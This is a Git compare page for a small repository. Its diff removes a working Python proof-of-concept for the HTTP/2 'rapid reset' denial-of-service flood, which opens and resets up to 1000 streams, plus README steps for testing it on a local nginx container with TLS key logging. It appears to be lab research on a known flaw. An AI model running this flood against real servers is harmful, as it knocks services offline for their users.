agatha/rr-dev
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Compare commits

base: agatha:188ab597014bc9b31f17230fbcba7e15f94f02a9
Branches Tags
agatha:master
..
compare: agatha:9fde8d6fbe08ed90712c373a5cbcee60ad49c237
Branches Tags
agatha:master

No commits in common. "188ab597014bc9b31f17230fbcba7e15f94f02a9" and "9fde8d6fbe08ed90712c373a5cbcee60ad49c237" have entirely different histories.
188ab59701 ... 9fde8d6fbe

4 changed files with 6 additions and 72 deletions
Show Stats Expand all files Collapse all files

3
.gitignore vendored
View File

@ -3,6 +3,3 @@ venv/
__pycache__/ __pycache__/
*.py[cod] *.py[cod]
# ignore ssl keylogs
*.log

16
README.md
View File

@ -1,22 +1,12 @@
# rr-dev # rr-dev
1. start http/2 enabled nginx server: start http/2 enabled nginx server:
``` ```
cd server cd server
docker compose up -d docker compose up -d
``` ```
2. start capturing traffic in wireshark run poc:
3. run poc script:
``` ```
python rr.py # needs to be written first, lol
``` ```
4. decode traffic in wireshark using `ssl-keylog.log` as the ssl keyfile
## notes
no clue if this actually works, but it seems to match the same behavior
mentioned in the cloudflare blog.
greets to psyk0, slerig, and all the other juggalols out there

2
src/examples/h2-example.py
View File

@ -44,7 +44,7 @@ def make_http2_request():
(':scheme', 'https'), (':scheme', 'https'),
] ]
c.send_headers( c.send_headers(
stream_id=c.get_next_available_stream_id(), stream_id=1,
headers=headers, headers=headers,
end_stream=True end_stream=True
) )

53
src/rr.py
View File

@ -1,54 +1 @@
"""rrpoc""" """rrpoc"""
import socket
import ssl
import certifi
import h2.connection
import h2.events
from time import sleep
ctx = ssl.create_default_context(cafile=certifi.where())
ctx.set_alpn_protocols(['h2'])
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.keylog_filename = 'ssl-keylog.log'
def send_rr_packets(server='localhost', port=443, max_streams=1000):
s = socket.create_connection((server, port))
s = ctx.wrap_socket(s, server_hostname=server)
c = h2.connection.H2Connection()
c.initiate_connection()
s.sendall(c.data_to_send())
headers = [
(':method', 'GET'),
(':path', '/foo'),
(':authority', server),
(':scheme', 'https'),
]
for _ in range(max_streams):
sid = c.get_next_available_stream_id()
c.send_headers(
stream_id=sid,
headers=headers,
end_stream=True
)
c.reset_stream(sid)
s.sendall(c.data_to_send())
# Add sleep or else the socket gets closed which causes server to
# stop trying to respond to our requests.
sleep(60)
s.close()
def main():
send_rr_packets(server='localhost', port=443)
if __name__ == '__main__':
main()